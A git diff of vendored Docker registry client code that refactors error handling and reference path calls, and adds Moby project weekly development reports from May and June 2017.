@@ -226,7 +228,7 @@ func (r *Session) GetRemoteHistory(imgID, registry string) ([]string, error) {
 		if res.StatusCode == 401 {
 			return nil, errcode.ErrorCodeUnauthorized.WithArgs()
 		}
-		return nil, httputils.NewHTTPRequestError(fmt.Sprintf("Server error: %d trying to fetch remote history for %s", res.StatusCode, imgID), res)
+		return nil, newJSONError(fmt.Sprintf("Server error: %d trying to fetch remote history for %s", res.StatusCode, imgID), res)
 	}
 
 	var history []string
@@ -246,7 +248,7 @@ func (r *Session) LookupRemoteImage(imgID, registry string) error {
 	}
 	res.Body.Close()
 	if res.StatusCode != 200 {
-		return httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code %d", res.StatusCode), res)
+		return newJSONError(fmt.Sprintf("HTTP code %d", res.StatusCode), res)
 	}
 	return nil
 }
@@ -259,7 +261,7 @@ func (r *Session) GetRemoteImageJSON(imgID, registry string) ([]byte, int64, err
 	}
 	defer res.Body.Close()
 	if res.StatusCode != 200 {
-		return nil, -1, httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code %d", res.StatusCode), res)
+		return nil, -1, newJSONError(fmt.Sprintf("HTTP code %d", res.StatusCode), res)
 	}
 	// if the size header is not present, then set it to '-1'
 	imageSize := int64(-1)
@@ -290,7 +292,7 @@ func (r *Session) GetRemoteImageLayer(imgID, registry string, imgSize int64) (io
 	if err != nil {
 		return nil, fmt.Errorf("Error while getting from the server: %v", err)
 	}
-	statusCode = 0
+
 	res, err = r.client.Do(req)
 	if err != nil {
 		logrus.Debugf("Error contacting registry %s: %v", registry, err)
@@ -313,7 +315,7 @@ func (r *Session) GetRemoteImageLayer(imgID, registry string, imgSize int64) (io
 
 	if res.Header.Get("Accept-Ranges") == "bytes" && imgSize > 0 {
 		logrus.Debug("server supports resume")
-		return httputils.ResumableRequestReaderWithInitialResponse(r.client, req, 5, imgSize, res), nil
+		return resumable.NewRequestReaderWithInitialResponse(r.client, req, 5, imgSize, res), nil
 	}
 	logrus.Debug("server doesn't support resume")
 	return res.Body, nil
@@ -324,7 +326,7 @@ func (r *Session) GetRemoteImageLayer(imgID, registry string, imgSize int64) (io
 // argument, and returns data from the first one that answers the query
 // successfully.
 func (r *Session) GetRemoteTag(registries []string, repositoryRef reference.Named, askedTag string) (string, error) {
-	repository := repositoryRef.RemoteName()
+	repository := reference.Path(repositoryRef)
 
 	if strings.Count(repository, "/") == 0 {
 		// This will be removed once the registry supports auto-resolution on
@@ -362,7 +364,7 @@ func (r *Session) GetRemoteTag(registries []string, repositoryRef reference.Name
 // the first one that answers the query successfully. It returns a map with
 // tag names as the keys and image IDs as the values.
 func (r *Session) GetRemoteTags(registries []string, repositoryRef reference.Named) (map[string]string, error) {
-	repository := repositoryRef.RemoteName()
+	repository := reference.Path(repositoryRef)
 
 	if strings.Count(repository, "/") == 0 {
 		// This will be removed once the registry supports auto-resolution on
@@ -416,7 +418,7 @@ func buildEndpointsList(headers []string, indexEp string) ([]string, error) {
 
 // GetRepositoryData returns lists of images and endpoints for the repository
 func (r *Session) GetRepositoryData(name reference.Named) (*RepositoryData, error) {
-	repositoryTarget := fmt.Sprintf("%srepositories/%s/images", r.indexEndpoint.String(), name.RemoteName())
+	repositoryTarget := fmt.Sprintf("%srepositories/%s/images", r.indexEndpoint.String(), reference.Path(name))
 
 	logrus.Debugf("[registry] Calling GET %s", repositoryTarget)
 
@@ -433,7 +435,7 @@ func (r *Session) GetRepositoryData(name reference.Named) (*RepositoryData, erro
 		// "Get https://index.docker.io/v1/repositories/library/busybox/images: i/o timeout"
 		// was a top search on the docker user forum
 		if isTimeout(err) {
-			return nil, fmt.Errorf("Network timed out while trying to connect to %s. You may want to check your internet connection or if you are behind a proxy.", repositoryTarget)
+			return nil, fmt.Errorf("network timed out while trying to connect to %s. You may want to check your internet connection or if you are behind a proxy", repositoryTarget)
 		}
 		return nil, fmt.Errorf("Error while pulling image: %v", err)
 	}
@@ -444,13 +446,13 @@ func (r *Session) GetRepositoryData(name reference.Named) (*RepositoryData, erro
 	// TODO: Right now we're ignoring checksums in the response body.
 	// In the future, we need to use them to check image validity.
 	if res.StatusCode == 404 {
-		return nil, httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code: %d", res.StatusCode), res)
+		return nil, newJSONError(fmt.Sprintf("HTTP code: %d", res.StatusCode), res)
 	} else if res.StatusCode != 200 {
 		errBody, err := ioutil.ReadAll(res.Body)
 		if err != nil {
 			logrus.Debugf("Error reading response body: %s", err)
 		}
-		return nil, httputils.NewHTTPRequestError(fmt.Sprintf("Error: Status %d trying to pull repository %s: %q", res.StatusCode, name.RemoteName(), errBody), res)
+		return nil, newJSONError(fmt.Sprintf("Error: Status %d trying to pull repository %s: %q", res.StatusCode, reference.Path(name), errBody), res)
 	}
 
 	var endpoints []string
@@ -537,12 +539,12 @@ func (r *Session) PushImageJSONRegistry(imgData *ImgData, jsonRaw []byte, regist
 	}
 	defer res.Body.Close()
 	if res.StatusCode == 401 && strings.HasPrefix(registry, "http://") {
-		return httputils.NewHTTPRequestError("HTTP code 401, Docker will not send auth headers over HTTP.", res)
+		return newJSONError("HTTP code 401, Docker will not send auth headers over HTTP.", res)
 	}
 	if res.StatusCode != 200 {
 		errBody, err := ioutil.ReadAll(res.Body)
 		if err != nil {
-			return httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code %d while uploading metadata and error when trying to parse response body: %s", res.StatusCode, err), res)
+			return newJSONError(fmt.Sprintf("HTTP code %d while uploading metadata and error when trying to parse response body: %s", res.StatusCode, err), res)
 		}
 		var jsonBody map[string]string
 		if err := json.Unmarshal(errBody, &jsonBody); err != nil {
@@ -550,7 +552,7 @@ func (r *Session) PushImageJSONRegistry(imgData *ImgData, jsonRaw []byte, regist
 		} else if jsonBody["error"] == "Image already exists" {
 			return ErrAlreadyExists
 		}
-		return httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code %d while uploading metadata: %q", res.StatusCode, errBody), res)
+		return newJSONError(fmt.Sprintf("HTTP code %d while uploading metadata: %q", res.StatusCode, errBody), res)
 	}
 	return nil
 }
@@ -591,9 +593,9 @@ func (r *Session) PushImageLayerRegistry(imgID string, layer io.Reader, registry
 	if res.StatusCode != 200 {
 		errBody, err := ioutil.ReadAll(res.Body)
 		if err != nil {
-			return "", "", httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code %d while uploading metadata and error when trying to parse response body: %s", res.StatusCode, err), res)
+			return "", "", newJSONError(fmt.Sprintf("HTTP code %d while uploading metadata and error when trying to parse response body: %s", res.StatusCode, err), res)
 		}
-		return "", "", httputils.NewHTTPRequestError(fmt.Sprintf("Received HTTP code %d while uploading layer: %q", res.StatusCode, errBody), res)
+		return "", "", newJSONError(fmt.Sprintf("Received HTTP code %d while uploading layer: %q", res.StatusCode, errBody), res)
 	}
 
 	checksumPayload = "sha256:" + hex.EncodeToString(h.Sum(nil))
@@ -605,7 +607,7 @@ func (r *Session) PushImageLayerRegistry(imgID string, layer io.Reader, registry
 func (r *Session) PushRegistryTag(remote reference.Named, revision, tag, registry string) error {
 	// "jsonify" the string
 	revision = "\"" + revision + "\""
-	path := fmt.Sprintf("repositories/%s/tags/%s", remote.RemoteName(), tag)
+	path := fmt.Sprintf("repositories/%s/tags/%s", reference.Path(remote), tag)
 
 	req, err := http.NewRequest("PUT", registry+path, strings.NewReader(revision))
 	if err != nil {
@@ -619,7 +621,7 @@ func (r *Session) PushRegistryTag(remote reference.Named, revision, tag, registr
 	}
 	res.Body.Close()
 	if res.StatusCode != 200 && res.StatusCode != 201 {
-		return httputils.NewHTTPRequestError(fmt.Sprintf("Internal server error: %d trying to push tag %s on %s", res.StatusCode, tag, remote.RemoteName()), res)
+		return newJSONError(fmt.Sprintf("Internal server error: %d trying to push tag %s on %s", res.StatusCode, tag, reference.Path(remote)), res)
 	}
 	return nil
 }
@@ -645,7 +647,7 @@ func (r *Session) PushImageJSONIndex(remote reference.Named, imgList []*ImgData,
 	if validate {
 		suffix = "images"
 	}
-	u := fmt.Sprintf("%srepositories/%s/%s", r.indexEndpoint.String(), remote.RemoteName(), suffix)
+	u := fmt.Sprintf("%srepositories/%s/%s", r.indexEndpoint.String(), reference.Path(remote), suffix)
 	logrus.Debugf("[registry] PUT %s", u)
 	logrus.Debugf("Image list pushed to index:\n%s", imgListJSON)
 	headers := map[string][]string{
@@ -683,7 +685,7 @@ func (r *Session) PushImageJSONIndex(remote reference.Named, imgList []*ImgData,
 			if err != nil {
 				logrus.Debugf("Error reading response body: %s", err)
 			}
-			return nil, httputils.NewHTTPRequestError(fmt.Sprintf("Error: Status %d trying to push repository %s: %q", res.StatusCode, remote.RemoteName(), errBody), res)
+			return nil, newJSONError(fmt.Sprintf("Error: Status %d trying to push repository %s: %q", res.StatusCode, reference.Path(remote), errBody), res)
 		}
 		tokens = res.Header["X-Docker-Token"]
 		logrus.Debugf("Auth token: %v", tokens)
@@ -701,7 +703,7 @@ func (r *Session) PushImageJSONIndex(remote reference.Named, imgList []*ImgData,
 			if err != nil {
 				logrus.Debugf("Error reading response body: %s", err)
 			}
-			return nil, httputils.NewHTTPRequestError(fmt.Sprintf("Error: Status %d trying to push checksums %s: %q", res.StatusCode, remote.RemoteName(), errBody), res)
+			return nil, newJSONError(fmt.Sprintf("Error: Status %d trying to push checksums %s: %q", res.StatusCode, reference.Path(remote), errBody), res)
 		}
 	}
 
@@ -733,40 +735,27 @@ func shouldRedirect(response *http.Response) bool {
 // SearchRepositories performs a search against the remote repository
 func (r *Session) SearchRepositories(term string, limit int) (*registrytypes.SearchResults, error) {
 	if limit < 1 || limit > 100 {
-		return nil, fmt.Errorf("Limit %d is outside the range of [1, 100]", limit)
+		return nil, errdefs.InvalidParameter(errors.Errorf("Limit %d is outside the range of [1, 100]", limit))
 	}
 	logrus.Debugf("Index server: %s", r.indexEndpoint)
 	u := r.indexEndpoint.String() + "search?q=" + url.QueryEscape(term) + "&n=" + url.QueryEscape(fmt.Sprintf("%d", limit))
 
 	req, err := http.NewRequest("GET", u, nil)
 	if err != nil {
-		return nil, fmt.Errorf("Error while getting from the server: %v", err)
+		return nil, errors.Wrap(errdefs.InvalidParameter(err), "Error building request")
 	}
 	// Have the AuthTransport send authentication, when logged in.
 	req.Header.Set("X-Docker-Token", "true")
 	res, err := r.client.Do(req)
 	if err != nil {
-		return nil, err
+		return nil, errdefs.System(err)
 	}
 	defer res.Body.Close()
 	if res.StatusCode != 200 {
-		return nil, httputils.NewHTTPRequestError(fmt.Sprintf("Unexpected status code %d", res.StatusCode), res)
+		return nil, newJSONError(fmt.Sprintf("Unexpected status code %d", res.StatusCode), res)
 	}
 	result := new(registrytypes.SearchResults)
-	return result, json.NewDecoder(res.Body).Decode(result)
-}
-
-// GetAuthConfig returns the authentication settings for a session
-// TODO(tiborvass): remove this once registry client v2 is vendored
-func (r *Session) GetAuthConfig(withPasswd bool) *types.AuthConfig {
-	password := ""
-	if withPasswd {
-		password = r.authConfig.Password
-	}
-	return &types.AuthConfig{
-		Username: r.authConfig.Username,
-		Password: password,
-	}
+	return result, errors.Wrap(json.NewDecoder(res.Body).Decode(result), "error decoding registry search results")
 }
 
 func isTimeout(err error) bool {
@@ -781,3 +770,10 @@ func isTimeout(err error) bool {
 	t, ok := e.(timeout)
 	return ok && t.Timeout()
 }
+
+func newJSONError(msg string, res *http.Response) error {
+	return &jsonmessage.JSONError{
+		Message: msg,
+		Code:    res.StatusCode,
+	}
+}
diff --git a/vendor/github.com/docker/docker/registry/types.go b/vendor/github.com/docker/docker/registry/types.go
index 49c123a3e2..28ed2bfa5e 100644
--- a/vendor/github.com/docker/docker/registry/types.go
+++ b/vendor/github.com/docker/docker/registry/types.go
@@ -1,19 +1,16 @@
-package registry
+package registry // import "github.com/docker/docker/registry"
 
 import (
+	"github.com/docker/distribution/reference"
 	registrytypes "github.com/docker/docker/api/types/registry"
-	"github.com/docker/docker/reference"
 )
 
-// RepositoryData tracks the image list, list of endpoints, and list of tokens
-// for a repository
+// RepositoryData tracks the image list, list of endpoints for a repository
 type RepositoryData struct {
 	// ImgList is a list of images in the repository
 	ImgList map[string]*ImgData
 	// Endpoints is a list of endpoints returned in X-Docker-Endpoints
 	Endpoints []string
-	// Tokens is currently unused (remove it?)
-	Tokens []string
 }
 
 // ImgData is used to transfer image checksums to and from the registry
@@ -60,7 +57,7 @@ var apiVersions = map[APIVersion]string{
 
 // RepositoryInfo describes a repository
 type RepositoryInfo struct {
-	reference.Named
+	Name reference.Named
 	// Index points to registry information
 	Index *registrytypes.IndexInfo
 	// Official indicates whether the repository is considered official.
diff --git a/vendor/github.com/docker/docker/reports/2017-05-01.md b/vendor/github.com/docker/docker/reports/2017-05-01.md
new file mode 100644
index 0000000000..366f4fce70
--- /dev/null
+++ b/vendor/github.com/docker/docker/reports/2017-05-01.md
@@ -0,0 +1,35 @@
+# Development Report for May 01, 2017
+
+This is the 1st report, since the Moby project was announced at DockerCon. Thank you to everyone that stayed an extra day to attend the summit on Thursday.
+
+## Daily Meeting
+
+A daily meeting is hosted on [slack](https://dockercommunity.slack.com/) every business day at 9am PST on the channel `#moby-project`.
+During this meeting, we are talking about the [tasks](https://github.com/moby/moby/issues/32867) needed to be done for splitting moby and docker.
+
+## Topics discussed last week
+
+### The moby tool
+
+The moby tool currently lives at [https://github.com/moby/tool](https://github.com/moby/tool), it's only a temporary place and will soon be merged in [https://github.com/moby/moby](https://github.com/moby/moby).
+
+### The CLI split
+
+Ongoing work to split the Docker CLI into [https://github.com/docker/cli](https://github.com/docker/cli) is happening [here](https://github.com/moby/moby/pull/32694).
+We are almost done, it should be merged soon.
+
+### Mailing list
+
+Slack works great for synchronous communication, but we need to place for async discussion. A mailing list is currently being setup.
+
+### Find a good and non-confusing home for the remaining monolith
+
+Lots of discussion and progress made on this topic, see [here](https://github.com/moby/moby/issues/32871). The work will start this week.
+
+## Componentization
+
+So far only work on the builder happened regarding the componentization effort.
+
+### builder
+
+The builder dev report can be found [here](builder/2017-05-01.md)
diff --git a/vendor/github.com/docker/docker/reports/2017-05-08.md b/vendor/github.com/docker/docker/reports/2017-05-08.md
new file mode 100644
index 0000000000..7f03335416
--- /dev/null
+++ b/vendor/github.com/docker/docker/reports/2017-05-08.md
@@ -0,0 +1,34 @@
+# Development Report for May 08, 2017
+
+## Daily Meeting
+
+A daily meeting is hosted on [slack](https://dockercommunity.slack.com) every business day at 9am PST on the channel `#moby-project`.
+During this meeting, we are talking about the [tasks](https://github.com/moby/moby/issues/32867) needed to be done for splitting moby and docker.
+
+## Topics discussed last week
+
+### The CLI split
+
+The Docker CLI was successfully moved to [https://github.com/docker/cli](https://github.com/docker/cli) last week thanks to @tiborvass
+The Docker CLI is now compiled from the [Dockerfile](https://github.com/moby/moby/blob/a762ceace4e8c1c7ce4fb582789af9d8074be3e1/Dockerfile#L248)
+
+### Mailing list
+
+Discourse is available at [forums.mobyproject.org](https://forums.mobyproject.org/) thanks to @thaJeztah. mailing-list mode is enabled, so once you register there, you will received every new threads / messages via email. So far, 3 categories were created: Architecture, Meta & Support. The last step missing is to setup an email address to be able to start a new thread via email.
+
+### Find a place for `/pkg`
+
+Lots of discussion and progress made on this [topic](https://github.com/moby/moby/issues/32989) thanks to @dnephin. [Here is the list](https://gist.github.com/dnephin/35dc10f6b6b7017f058a71908b301d38) proposed to split/reorganize the pkgs.
+
+### Find a good and non-confusing home for the remaining monolith
+
+@cpuguy83 is leading the effort [here](https://github.com/moby/moby/pull/33022). It's still WIP but the way we are experimenting with is to reorganise directories within the moby/moby.
+
+## Componentization
+
+So far only work on the builder, by @tonistiigi, happened regarding the componentization effort.
+
+### builder
+
+The builder dev report can be found [here](builder/2017-05-08.md)
+
diff --git a/vendor/github.com/docker/docker/reports/2017-05-15.md b/vendor/github.com/docker/docker/reports/2017-05-15.md
new file mode 100644
index 0000000000..7556f9cc4a
--- /dev/null
+++ b/vendor/github.com/docker/docker/reports/2017-05-15.md
@@ -0,0 +1,52 @@
+# Development Report for May 15, 2017
+
+## Daily Meeting
+
+A daily meeting is hosted on [slack](https://dockercommunity.slack.com) every business day at 9am PST on the channel `#moby-project`.
+During this meeting, we are talking about the [tasks](https://github.com/moby/moby/issues/32867) needed to be done for splitting moby and docker.
+
+## Topics discussed last week
+
+### The CLI split
+
+Work is in progress to move the "opts" package to the docker/cli repository. The package, was merged into the docker/cli
+repository through [docker/cli#82](https://github.com/docker/cli/pull/82), preserving Git history, and parts that are not
+used in Moby have been removed through [moby/moby#33198](https://github.com/moby/moby/pull/33198).
+
+### Find a good and non-confusing home for the remaining monolith
+
+Discussion on this topic is still ongoing, and possible approaches are looked into. The active discussion has moved
+from GitHub to [https://forums.mobyproject.org/](https://forums.mobyproject.org/t/topic-find-a-good-an-non-confusing-home-for-the-remaining-monolith/37)
+
+### Find a place for `/pkg`
+
+Concerns were raised about moving packages to separate repositories, and it was decided to put some extra effort into
+breaking up / removing existing packages that likely are not good candidates to become a standalone project.
+
+### Update integration-cli tests
+
+With the removal of the CLI from the moby repository, new pull requests will have to be tested using API tests instead
+of using the CLI. Discussion took place whether or not these tests should use the API `client` package, or be completely
+independent, and make raw HTTP calls.
+
+A topic was created on the forum to discuss options: [evolution of testing](https://forums.mobyproject.org/t/evolution-of-testing-moby/38)
+
+
+### Proposal: split &amp; containerize hack/validate 
+
+[@AkihiroSuda](https://github.com/AkihiroSuda) is proposing to split and containerize the `hack/validate` script and 
+[started a topic on the forum](https://forums.mobyproject.org/t/proposal-split-containerize-hack-validate/32). An initial
+proposal to add validation functionality to `vndr` (the vendoring tool in use) was rejected upstream, so alternative
+approaches were discussed.
+
+
+### Special Interest Groups
+
+A "SIG" category was created on the forums to provide a home for Special Interest Groups. The first SIG, [LinuxKit 
+Security](https://forums.mobyproject.org/t/about-the-linuxkit-security-category/44) was started (thanks 
+[@riyazdf](https://github.com/riyazdf)).
+
+
+### Builder
+
+The builder dev report can be found [here](builder/2017-05-15.md)
diff --git a/vendor/github.com/docker/docker/reports/2017-06-05.md b/vendor/github.com/docker/docker/reports/2017-06-05.md
new file mode 100644
index 0000000000..63679ed033
--- /dev/null
+++ b/vendor/github.com/docker/docker/reports/2017-06-05.md
@@ -0,0 +1,36 @@
+# Development Report for June 5, 2017
+
+## Daily Meeting
+
+A daily meeting is hosted on [slack](https://dockercommunity.slack.com) every business day at 9am PST on the channel `#moby-project`.
+Lots of discussion happened during this meeting to kickstart the project, but now that we have the forums, we see less activity there.
+We are discussing the future of this meeting [here](https://forums.mobyproject.org/t/of-standups-future), we will possibility move the meeting
+to weekly.
+
+## Topics discussed last week
+
+### The CLI split
+
+Thanks to @tiborvass, the man pages, docs and completion scripts were imported to `github.com/docker/cli` [last week](https://github.com/docker/cli/pull/147)
+Once everything is finalised, we will remove them from `github.com/moby/moby`
+
+### Find a good and non-confusing home for the remaining monolith
+
+Discussion on this topic is still ongoing, and possible approaches are looked into. The active discussion has moved
+from GitHub to [https://forums.mobyproject.org/](https://forums.mobyproject.org/t/topic-find-a-good-an-non-confusing-home-for-the-remaining-monolith)
+
+
+### Find a place for `/pkg`
+
+Thanks to @dnephin this topic in on-going, you can follow progress [here](https://github.com/moby/moby/issues/32989)
+Many pkgs were reorganised last week, and more to come this week.
+
+
+### Builder
+
+The builder dev report can be found [here](builder/2017-06-05.md)
+
+
+### LinuxKit
+
+The LinuxKit dev report can be found [here](https://github.com/linuxkit/linuxkit/blob/master/reports/2017-06-03.md)
diff --git a/vendor/github.com/docker/docker/reports/2017-06-12.md b/vendor/github.com/docker/docker/reports/2017-06-12.md
new file mode 100644
index 0000000000..8aef38c6b0
--- /dev/null
+++ b/vendor/github.com/docker/docker/reports/2017-06-12.md
@@ -0,0 +1,78 @@
+# Development Report for June 12, 2017
+
+## Moby Summit
+
+The next Moby Summit will be at Docker HQ on June 19th, register [here](https://www.eventbrite.com/e/moby-summit-tickets-34483396768)
+
+## Daily Meeting
+
+### The CLI split
+
+Manpages and docs yaml files can now be generated on [docker/cli](https://github.com/docker/cli).
+Man pages, docs and completion scripts will be removed next week thanks to @tiborvass 
+
+### Find a good and non-confusing home for the remaining monolith
+
+Lot's of dicussion happened on the [forums](https://forums.mobyproject.org/t/topic-find-a-good-an-non-confusing-home-for-the-remaining-monolith)
+We should expect to do those changes after the moby summit. We contacted github to work with them so we have a smooth move.
+
+### Moby tool
+
+`moby` tool docs were moved from [LinuxKit](https://github.com/linuxkit/linuxkit) to the [moby tool repo](https://github.com/moby/tool) thanks to @justincormack
+
+### Custom golang URLs
+
+More discussions on the [forums](https://forums.mobyproject.org/t/cutoms-golang-urls), no agreement for now.
+
+### Buildkit
+
+[Proposal](https://github.com/moby/moby/issues/32925)
+
+More updates to the [POC repo](https://github.com/tonistiigi/buildkit_poc). It now contains binaries for the daemon and client. Examples directory shows a way for invoking a build job by generating the internal low-level build graph definition with a helper binary(as there is not support for frontends yet). The grpc control server binary can be built in two versions, one that connects to containerD socket and other that doesn't have any external dependencies.
+
+If you have questions or want to help, stop by the issues section of that repo or the proposal in moby/moby.
+
+#### Typed Dockerfile parsing
+
+[PR](https://github.com/moby/moby/pull/33492)
+
+New PR that enables parsing Dockerfiles into typed structures so they can be preprocessed to eliminate unnecessary build stages and reused with different kinds of dispatchers.
+
+#### Long running session & incremental file sending
+
+[PR ](https://github.com/moby/moby/pull/32677) 
+
+Same status as last week. The PR went through one pass of review from @dnephin and has been rebased again. Maintainers are encouraged to give this one a review so it can be included in `v17.07` release.
+
+
+#### Quality: Dependency interface switch
+
+[Move file copying from the daemon to the builder](https://github.com/moby/moby/pull/33454) PR is waiting for a second review. 
+
+#### Proposals for new Dockerfile features that need design feedback:
+
+[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100)
+
+[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487)
+
+[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507)
+
+[DAG image builder](https://github.com/moby/moby/issues/32550)
+
+[Option to export the hash of the build context](https://github.com/moby/moby/issues/32963) (new)
+
+[Allow --cache-from=*](https://github.com/moby/moby/issues/33002#issuecomment-299041162) (new)
+
+[Provide advanced .dockeringore use-cases](https://github.com/moby/moby/issues/12886) [2](https://github.com/moby/moby/issues/12886#issuecomment-306247989)
+
+If you are interested in implementing any of them, leave a comment on the specific issues.
+
+#### Builder features currently in code-review:
+
+[Warn/deprecate continuing on empty lines in `Dockerfile`](https://github.com/moby/moby/pull/29161)
+
+[Fix behavior of absolute paths in .dockerignore](https://github.com/moby/moby/pull/32088)
+
+#### Backlog
+
+[Build secrets](https://github.com/moby/moby/issues/33343) has not got much traction. If you want this feature to become a reality, please make yourself heard.
diff --git a/vendor/github.com/docker/docker/reports/2017-06-26.md b/vendor/github.com/docker/docker/reports/2017-06-26.md
new file mode 100644
index 0000000000..e12533ae46
--- /dev/null
+++ b/vendor/github.com/docker/docker/reports/2017-06-26.md
@@ -0,0 +1,120 @@
+# Development Report for June 26, 2017
+
+## Moby Summit
+
+The Moby Summit held in San Francisco was very active and well attended ([blog](http://mobyproject.org/blog/2017/06/26/moby-summit-recap/) / [linuxkit table notes](https://github.com/linuxkit/linuxkit/blob/master/reports/2017-06-19-summit.md) [#2090](https://github.com/linuxkit/linuxkit/pull/2090) [#2033](https://github.com/linuxkit/linuxkit/pull/2033) [@mgoelzer] [@justincormack]). 
+
+## Container Engine
+
+Thanks to @fabiokung there is no container locks anymore on `docker ps` [#31273](https://github.com/moby/moby/pull/31273)
+
+## BuildKit
+
+[Repo](https://github.com/moby/buildkit)
+[Proposal](https://github.com/moby/moby/issues/32925)
+
+New development repo is open at https://github.com/moby/buildkit
+
+The readme file provides examples how to get started. You can see an example of building BuildKit with BuildKit.
+
+There are lots of new issues opened as well to track the missing functionality. You are welcomed to help on any of them or discuss the design there.
+
+Last week most of the work was done on improving the `llb` client library for more complicated use cases and providing traces and interactive progress of executed build jobs.
+
+The `llb` client package is a go library that helps you to generate the build definition graph. It uses chained methods to make it easy to describe what steps need to be running. Mounts can be added to the execution steps for defining multiple inputs or outputs. To prepare the graph, you just have to call `Marshal()` on a leaf node that will generate the protobuf definition for everything required to build that node.
+
+### Typed Dockerfile parsing
+
+[PR](https://github.com/moby/moby/pull/33492)
+
+This PR that enables parsing Dockerfiles into typed structures so they can be preprocessed to eliminate unnecessary build stages and reused with different kinds of dispatchers(eg. BuildKit).
+
+The PR had some review and updates in last week. Should be ready to code review soon.
+
+### Merged: Long running session & incremental file sending
+
+[PR](https://github.com/moby/moby/pull/32677) 
+
+Incremental context sending PR was merged and is expected to land in `v17.07`.
+
+This feature experimental feature lets you skip sending the build context to the daemon on repeated builder invocations during development. Currently, this feature requires a CLI flag `--stream=true`. If this flag is used, one first builder invocation full build context is sent to the daemon. On a second attempt, only the changed files are transferred.
+
+Previous build context is saved in the build cache, and you can see how much space it takes form `docker system df`. Build cache will be automatically garbage collected and can also be manually cleared with `docker prune`.
+
+### Quality: Dependency interface switch
+
+[Move file copying from the daemon to the builder](https://github.com/moby/moby/pull/33454) PR was merged.
+
+
+### Proposals for new Dockerfile features that need design feedback:
+
+[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100)
+
+[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487)
+
+[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507)
+
+[DAG image builder](https://github.com/moby/moby/issues/32550)
+
+[Option to export the hash of the build context](https://github.com/moby/moby/issues/32963) (new)
+
+[Allow --cache-from=*](https://github.com/moby/moby/issues/33002#issuecomment-299041162) (new)
+
+[Provide advanced .dockeringore use-cases](https://github.com/moby/moby/issues/12886) [2](https://github.com/moby/moby/issues/12886#issuecomment-306247989)
+
+If you are interested in implementing any of them, leave a comment on the specific issues.
+
+### Other builder PRs merged last week
+
+[Warn/deprecate continuing on empty lines in `Dockerfile`](https://github.com/moby/moby/pull/29161)
+
+[Fix behavior of absolute paths in .dockerignore](https://github.com/moby/moby/pull/32088)
+
+[fix copy —from conflict with force pull](https://github.com/moby/moby/pull/33735)
+
+### Builder features currently in code-review:
+
+[Fix handling of remote "git@" notation](https://github.com/moby/moby/pull/33696)
+
+[builder: Emit a BuildResult after squashing.](https://github.com/moby/moby/pull/33824)
+
+[Fix shallow git clone in docker-build](https://github.com/moby/moby/pull/33704)
+
+### Backlog
+
+[Build secrets](https://github.com/moby/moby/issues/33343) has not got much traction. If you want this feature to become a reality, please make yourself heard.
+
+## LinuxKit
+
+* **Kernel GPG verification:** The kernel compilation containers now verify the GPG and SHA256
+  checksums before building the binaries. ([#2062](https://github.com/linuxkit/linuxkit/issues/2062) [#2083](https://github.com/linuxkit/linuxkit/issues/2083) [@mscribe] [@justincormack] [@rn] [@riyazdf]).
+  The base Alpine build image now includes `gnupg` to support this feature ([#2091](https://github.com/linuxkit/linuxkit/issues/2091) [@riyazdf] [@rn]).
+
+* **Security SIG on Landlock:** The third Moby Security SIG focussed on the [Landlock](https://github.com/landlock-lsm) security module that provides unprivileged fine-grained sandboxing to applications.  There are videos and forum links ([#2087](https://github.com/linuxkit/linuxkit/issues/2087) [#2089](https://github.com/linuxkit/linuxkit/issues/2089) [#2073](https://github.com/linuxkit/linuxkit/issues/2073) [@riyazdf]).
+
+* **Networking drivers now modules:** The kernels have been updated to 4.11.6/4.9.33/4.4.73, and many drivers are now loaded as modules to speed up boot-time ([#2095](https://github.com/linuxkit/linuxkit/issues/2095) [#2061](https://github.com/linuxkit/linuxkit/issues/2061) [@rn] [@justincormack] [@tych0])
+
+- **Whaley important update:** The ASCII logo was updated and we fondly wave goodbye to the waves. ([#2084](https://github.com/linuxkit/linuxkit/issues/2084) [@thaJeztah] [@rn])
+
+- **Containerised getty and sshd:** The login services now run in their own mount namespace, which was confusing people since they were expecting it to be on the host filesystem.  This is now being addressed via a reminder in the `motd` upon login ([#2078](https://github.com/linuxkit/linuxkit/issues/2078) [#2097](https://github.com/linuxkit/linuxkit/issues/2097) [@deitch] [@ijc] [@justincormack] [@riyazdf] [@rn])
+
+- **Hardened user copying:** The RFC on ensuring that we use a hardened kernel/userspace copying system was closed, as it is enabled by default on all our modern kernels and a regression test is included by default ([#2086](https://github.com/linuxkit/linuxkit/issues/2086) [@fntlnz] [@riyazdf]).
+
+- **Vultr provider:** There is an ongoing effort to add a metadata provider for [Vultr](http://vultr.com) ([#2101](https://github.com/linuxkit/linuxkit/issues/2101) [@furious-luke] [@justincormack]).
+
+### Packages and Projects
+
+- Simplified Makefiles for packages ([#2080](https://github.com/linuxkit/linuxkit/issues/2080) [@justincormack] [@rn])
+- The MirageOS SDK is integrating many upstream changes from dependent libraries, for the DHCP client ([#2070](https://github.com/linuxkit/linuxkit/issues/2070) [#2072](https://github.com/linuxkit/linuxkit/issues/2072) [@samoht] [@talex5] [@avsm]).
+
+### Documentation and Tests
+
+- A comprehensive test suite for containerd is now integrated into LinuxKit tests ([#2062](https://github.com/linuxkit/linuxkit/issues/2062) [@AkihiroSuda] [@justincormack] [@rn])
+- Fix documentation links ([#2074](https://github.com/linuxkit/linuxkit/issues/2074) [@ndauten] [@justincormack])
+- Update RTF version ([#2077](https://github.com/linuxkit/linuxkit/issues/2077) [@justincormack])
+- tests: add build test for Docker for Mac blueprint ([#2093](https://github.com/linuxkit/linuxkit/issues/2093) [@riyazdf] [@MagnusS])
+- Disable Qemu EFI ISO test for now ([#2100](https://github.com/linuxkit/linuxkit/issues/2100) [@justincormack])
